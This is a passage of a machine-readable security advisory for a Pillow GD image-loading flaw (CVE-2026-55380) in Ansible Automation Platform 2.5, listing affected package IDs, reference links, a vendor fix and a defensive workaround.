"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55380"
},
{
"category": "external",
"summary": "RHBZ#2497455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497455"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55380",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55380"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675",
"url": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm"
}
],
"release_date": "2026-07-06T18:50:14.789000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "workaround",
"details": "Avoid processing untrusted GD 2.x image files with PIL.GdImageFile.open(). Use Image.open() instead, which includes decompression bomb protections for supported formats. If GdImageFile must be used, validate the image dimensions before calling load(). Restricting accepted image formats at the application boundary to only those explicitly needed can reduce exposure.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
